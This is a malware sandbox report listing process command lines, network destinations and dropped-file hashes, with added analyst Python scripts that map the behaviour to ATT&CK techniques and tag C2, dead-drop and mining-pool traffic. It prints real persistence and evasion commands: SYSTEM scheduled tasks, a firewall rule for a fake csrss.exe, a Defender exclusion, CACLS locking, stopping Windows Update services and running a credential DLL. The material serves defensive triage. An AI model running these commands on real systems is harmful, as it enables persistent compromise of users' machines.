"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7056299293.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
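Added example (analyst code, not the sandbox's): the command lines above are the most reusable part of this report, because the same handful of shapes recur across Amadey, Glupteba and XMRig loaders whatever the file names are. The script below re-scans them with a small rule set and maps each hit to the ATT&CK technique an analyst would file it under (the MITRE section of this page is empty, so the IDs are supplied here from the public Enterprise matrix); the rules, labels and regexes are this example's assumptions, not signatures the sandbox ships. Matching is done on the command line only: several entries in the list show an image path under SysWOW64 while the command line names System32, which is WoW64 file-system redirection for a 32-bit parent rather than tampering. The sample input is a constructed subset copied from the list above; the makecab.exe line is included as a benign control (the OS compressing its own CBS log during the run) and should produce no hit.

```python
"""Re-scan sandbox process command lines for the evasion and persistence shapes seen above."""
import re
from collections import Counter

# Constructed sample: command lines copied from the process list above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F',
    r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"',
    r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main',
    r'"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005083231.log C:\Windows\Logs\CBS\CbsPersist_20231005083231.cab',
]

# (label, ATT&CK technique, pattern). Labels, grouping and regexes are this example's
# assumptions; the technique IDs are from the public Enterprise matrix. None means no
# precise sub-technique fits (keeping the host awake, opening a tracking link).
RULES = [
    ("Defender exclusion added", "T1562.001",
     re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("Scheduled task created", "T1053.005",
     re.compile(r'schtasks(\.exe)?"?\s+/create\b', re.I)),
    ("Windows Update / BITS services stopped", "T1489",
     re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("Firewall allow rule added", "T1562.004",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b", re.I)),
    ("Dropped payload locked with CACLS", "T1222.001",
     re.compile(r'\bCACLS\s+"[^"]+"\s+/P\s+"[^"]+:N"', re.I)),
    ("rundll32 loading a DLL from the user profile", "T1218.011",
     re.compile(r'rundll32(\.exe)?"?\s+"?C:\\Users\\\S+\.dll', re.I)),
    ("Sleep/hibernate timeouts zeroed", None,
     re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0", re.I)),
    ("IP-logging link opened in the browser", None,
     re.compile(r"\bstart\s+https?://iplogger\.", re.I)),
]


def triage(cmdlines):
    """One hit per (rule, command line); a line can hit several rules."""
    hits = []
    for line in cmdlines:
        for label, technique, pattern in RULES:
            if pattern.search(line):
                hits.append({"label": label, "technique": technique, "cmdline": line})
    return hits


def summarize(cmdlines):
    """Count hits per label, e.g. to notice that two different tasks were created."""
    return Counter(h["label"] for h in triage(cmdlines))


def task_details(cmdline):
    """Pull name, schedule, repeat modifier and run-as account out of a schtasks /create line."""
    def opt(flag):
        m = re.search(r"/" + flag + r'\s+"?([^"\s]+)"?', cmdline, re.I)
        return m.group(1) if m else None
    return {"name": opt("TN"), "schedule": opt("SC"), "modifier": opt("MO"), "runas": opt("RU")}


if __name__ == "__main__":
    for h in triage(SAMPLE_CMDLINES):
        print(f'{h["technique"] or "-":10} {h["label"]:45} {h["cmdline"][:70]}')
```

task_details is what separates the two schtasks entries: the Amadey task (nhdues.exe) relaunches every minute under the current user, while the miner task (GoogleUpdateTaskMachineQC) is created from an XML file and runs as SYSTEM, which is why its updater.exe payload can later stop services and write under Program Files. The CACLS pair is worth keeping as its own rule because it is an unusual shape for benign software: it denies then re-grants read-only access to the dropped directory so the user cannot delete it through Explorer.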

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 104.21.93.225:443 flyawayaero.net tcp
US 8.8.8.8:53 goboh2b.top udp
US 188.114.97.0:443 jetpackdelivery.net tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
NL 13.227.219.83:443 downloads.digitalpulsedata.com tcp
US 8.8.8.8:53 link.storjshare.io udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 potatogoose.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 172.67.180.173:443 potatogoose.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
RU 212.193.49.228:80 goboh2b.top tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.97.0:443 justsafepay.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 172.67.222.167:443 m7val1dat0r.info tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 link.storjshare.io udp
US 8.8.8.8:53 link.storjshare.io udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 136.0.77.2:443 link.storjshare.io tcp
DE 3.5.139.125:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
DE 78.47.27.247:80 78.47.27.247 tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
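Added example (analyst code, not part of the report): the network table mixes several kinds of traffic that a responder treats differently, and reading it flat hides that. The script below parses rows in the format above and tags each destination: raw-IP HTTP connections (5.42.64.10 and 85.217.144.143, which have no DNS lookup in front of them), dead-drop resolvers (t.me, steamcommunity.com and pastebin.com; Vidar-family stealers are widely documented to read a public Telegram or Steam profile page for their current C2 address), abused file hosting (Storj, S3, Scaleway, Seafile and Google Apps Script, the traffic behind the page's own "Legitimate hosting services abused" signature), an install-tracking link (iplogger), certificate-chain noise from the OS (apps.identrust.com), and a Monero pool on a non-web port (xmr.2miners.com:12222, matching the XMRig signature). The service lists and tag names are this example's assumptions; the sample rows are a constructed subset copied from the table.

```python
"""Tag the rows of the sandbox network table by what they mean to a responder."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of rows copied from the Network table above.
SAMPLE_ROWS = """
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 136.0.77.2:443 link.storjshare.io tcp
DE 3.5.139.125:443 wewewe.s3.eu-central-1.amazonaws.com tcp
NL 149.154.167.99:443 t.me tcp
JP 23.207.106.113:443 steamcommunity.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 172.217.23.206:443 script.google.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
DE 162.19.139.184:12222 xmr.2miners.com tcp
"""

# Row grammar of this report: "CC ip:port domain proto".
ROW = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+(?P<domain>\S+)\s+(?P<proto>tcp|udp)$"
)

# Analyst-maintained lists (assumptions of this example, not sandbox output).
DEAD_DROP = {"t.me", "steamcommunity.com", "pastebin.com"}   # C2 address read from a public page
FILE_HOSTING = ("storjshare.io", "amazonaws.com", "scw.cloud", "seafile.com", "script.google.com")
TRACKING = ("iplogger.com", "iplogger.org")
OS_NOISE = ("identrust.com",)                                 # certificate chain / CRL fetches
MINING_POOLS = ("2miners.com",)
WEB_PORTS = {80, 443}


def parse_rows(text):
    """Parse the rows; lines that do not match the grammar are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def is_ip(s):
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def classify(row):
    """Return the sorted tags for one connection row."""
    if row["proto"] == "udp" and row["port"] == 53:
        return ["dns-lookup"]
    dom, tags = row["domain"], []
    if is_ip(dom):
        tags.append("direct-to-ip")          # no hostname: the address is hard-coded in the sample
    if dom in DEAD_DROP:
        tags.append("dead-drop-resolver")
    if dom.endswith(FILE_HOSTING):
        tags.append("abused-file-hosting")
    if dom.endswith(TRACKING):
        tags.append("install-tracking")
    if dom.endswith(OS_NOISE):
        tags.append("os-background-noise")
    if row["port"] not in WEB_PORTS:
        tags.append("non-web-port")
        if dom.endswith(MINING_POOLS):
            tags.append("mining-pool")
    return sorted(tags) or ["unclassified"]


def report(text):
    """Map each destination (domain:port) to its tags, merging repeated rows and dropping DNS."""
    out = defaultdict(set)
    for row in parse_rows(text):
        tags = classify(row)
        if tags == ["dns-lookup"]:
            continue
        out[f'{row["domain"]}:{row["port"]}'].update(tags)
    return {k: sorted(v) for k, v in sorted(out.items())}


if __name__ == "__main__":
    for dest, tags in report(SAMPLE_ROWS).items():
        print(f"{dest:45} {', '.join(tags)}")
```

The useful blocking decisions fall out of the tags rather than the raw list: the direct-to-ip and mining-pool destinations can be blocked outright, the dead-drop resolvers and file-hosting domains cannot (they are shared services), so for those the indicator is the specific path or profile the sample fetched, which the table does not show and which has to come from a proxy log or a packet capture of the run.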

Files

memory/2476-0-0x0000000000A60000-0x0000000000AA8000-memory.dmp

memory/2476-1-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/2476-2-0x0000000004F40000-0x0000000004F80000-memory.dmp

memory/2476-3-0x00000000003B0000-0x00000000003D8000-memory.dmp

memory/2476-4-0x0000000000350000-0x000000000036A000-memory.dmp

memory/2408-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2408-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2408-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2408-11-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/2408-12-0x0000000004660000-0x00000000046A0000-memory.dmp

memory/2476-10-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/2968-15-0x0000000070520000-0x0000000070ACB000-memory.dmp

memory/2968-16-0x0000000070520000-0x0000000070ACB000-memory.dmp

memory/2968-17-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2968-18-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2968-19-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2968-20-0x0000000070520000-0x0000000070ACB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab539E.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar542D.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 284a7d3824199132bf69fec97c9b00ed
SHA1 934e7d65d37ed311c987ab2b7d082cd76498bd94
SHA256 a95b38ba989a95af6adc27ef639ca8ed93afbae4c2ab6bcd5c89c05149bcebb7
SHA512 da47da74073c13123092eb614fcfc53c507e6ea3fba0d59507564cc5fd22957b9254b0829b52e07a16a0eb5375dd8ba41771d804f2bc62dfc24c0ef19ef59ffa

\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

MD5 48d0057e8cf7a96380dafd471618851b
SHA1 a0f357c1de69c52f31f0b13db4c4d9b82bba00e7
SHA256 54e325a72006f941def72ec6c2b3187c324dd4a9d65863e9264b83af340140df
SHA512 ac2822a21a3f52d091366f0ae8fe9087e7c19c3e200ff6717f6216587031fe2aa2a7ed7395bed9372d327a7d3982b6583e79e6d29a8832f702f00ae2827f7734

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 c3908ef013aa5f9d347e90e2e230a608
SHA1 6f7aadeaa04d30ed4073b7ecbed25c234a829296
SHA256 6a000bd56b43e6f0c72e0f5c418e6e8af957a38ee52f7659a4a48a57f960395b
SHA512 670c9a931b10cb11d92ce1f45a55bdb243cabc9f48ea535a6283d8784f0d9e6479ee63bd83851ddca8cba3d716c901d1565de3c190437f21aab5ae16eec49552

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 51acfd9081d697ddfeacb01468f24bb4
SHA1 b2211f0c2ba288580610f82f16bbd711518910c3
SHA256 af5fe89b0cd6c0de9dbecfb5acfaf23e0d241fd4cf407efa133bd3e1ea8c1b26
SHA512 4a853f4b065039c9f5802cb6d2df5d5421db3d48cf2c753c125114091a535956ef9c3fbfe2c62475d3bf54e320e2196ac2cca509a5440301aa0a6bfe1ef45a71

C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

MD5 d88f367b41afa18635f0bfb34183116d
SHA1 9c5ed052125574db17b29db79e1288a2fb4cf645
SHA256 d8795171f1813169491e289f5997f267081a9df66145301f4c75b3d0c01dce3f
SHA512 8187c5f350eb23727544ed9f25f56dcf748f0a97c54b738226e88fdc86f38808768a436b1e3950e8a9774029c0ee1ac5945697488cd9cc9ec6e8a291cb81fa4b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d059a3bc734015c8e957cac413a466fe
SHA1 c44c841d960449135ac204a77803ce7cf4d76cca
SHA256 2aa48ff28bf513548f428ccbaba7667208e5967f364b8a82eb7a6dcf9e2f6e5c
SHA512 8ad6c2613bf69bf4f90583c27761925fec5e08e3ea2a1b06df41b6f44ab0f5c40cbeb2f7060afb4c9e5e7ba4e0e515180691c7bac5665573a6506296a01e9bd0

memory/2156-169-0x0000000002820000-0x0000000002C18000-memory.dmp

\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

MD5 d88f367b41afa18635f0bfb34183116d
SHA1 9c5ed052125574db17b29db79e1288a2fb4cf645
SHA256 d8795171f1813169491e289f5997f267081a9df66145301f4c75b3d0c01dce3f
SHA512 8187c5f350eb23727544ed9f25f56dcf748f0a97c54b738226e88fdc86f38808768a436b1e3950e8a9774029c0ee1ac5945697488cd9cc9ec6e8a291cb81fa4b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3da8296b9f88d579ee36a2fd96503bd8
SHA1 7990e56a5dd0fae07f7a50fa5cc064c4a8501350
SHA256 642cbc39384448779b9f6c7e49c13bd6e251b8ce36fe0bd31eecd3e226c0cd50
SHA512 55771c6e75af373b7cb7c4b1e2305d956ac035fac2d4c0aa369fbe44bb865eb4baf4fd0c67756fcfbfed81512bdecf05cd7b0f9caa676f35410e5e98c9b98740

\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe

MD5 ffb1cc96c04308e8cf27d8c8251ee01a
SHA1 2b33aa254e10f473040b8d65b53862b2bea289c4
SHA256 a8dc0238b6272da428b85bba473b20ff20346d759204b8c689b1a8af3a24a9be
SHA512 fb0df2d1c3ba98b8ff681c00a22debfc2445f39d7acd6c532681f7ef2c21d8bdc7f30306d3486182f95697d671fae601c5eb4561056d930f851d4b69c816abc0

\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

MD5 62d6a198c99181c34ed818ad81b0a53e
SHA1 5e2602291a0cbf72596df131dbde185289cec960
SHA256 57cea16be87d9a2ee11b089645d3c2693ff5cf9db4a3270755aabcf64c83e18e
SHA512 0a7e03e27fd21d6644a8c0107908ea79a6019cc5b7a95a5deedfbe88f9ffe4196d1b6dccc83df2879dd52f177c15cd42e3ea2ad79f0270de6357e5b29e88c1e8

C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

MD5 62d6a198c99181c34ed818ad81b0a53e
SHA1 5e2602291a0cbf72596df131dbde185289cec960
SHA256 57cea16be87d9a2ee11b089645d3c2693ff5cf9db4a3270755aabcf64c83e18e
SHA512 0a7e03e27fd21d6644a8c0107908ea79a6019cc5b7a95a5deedfbe88f9ffe4196d1b6dccc83df2879dd52f177c15cd42e3ea2ad79f0270de6357e5b29e88c1e8

memory/2408-264-0x00000000075C0000-0x0000000007B0D000-memory.dmp

memory/2408-277-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/1748-278-0x00000000003E0000-0x000000000092D000-memory.dmp

C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe

MD5 ffb1cc96c04308e8cf27d8c8251ee01a
SHA1 2b33aa254e10f473040b8d65b53862b2bea289c4
SHA256 a8dc0238b6272da428b85bba473b20ff20346d759204b8c689b1a8af3a24a9be
SHA512 fb0df2d1c3ba98b8ff681c00a22debfc2445f39d7acd6c532681f7ef2c21d8bdc7f30306d3486182f95697d671fae601c5eb4561056d930f851d4b69c816abc0

\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2152-290-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050832034201748.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

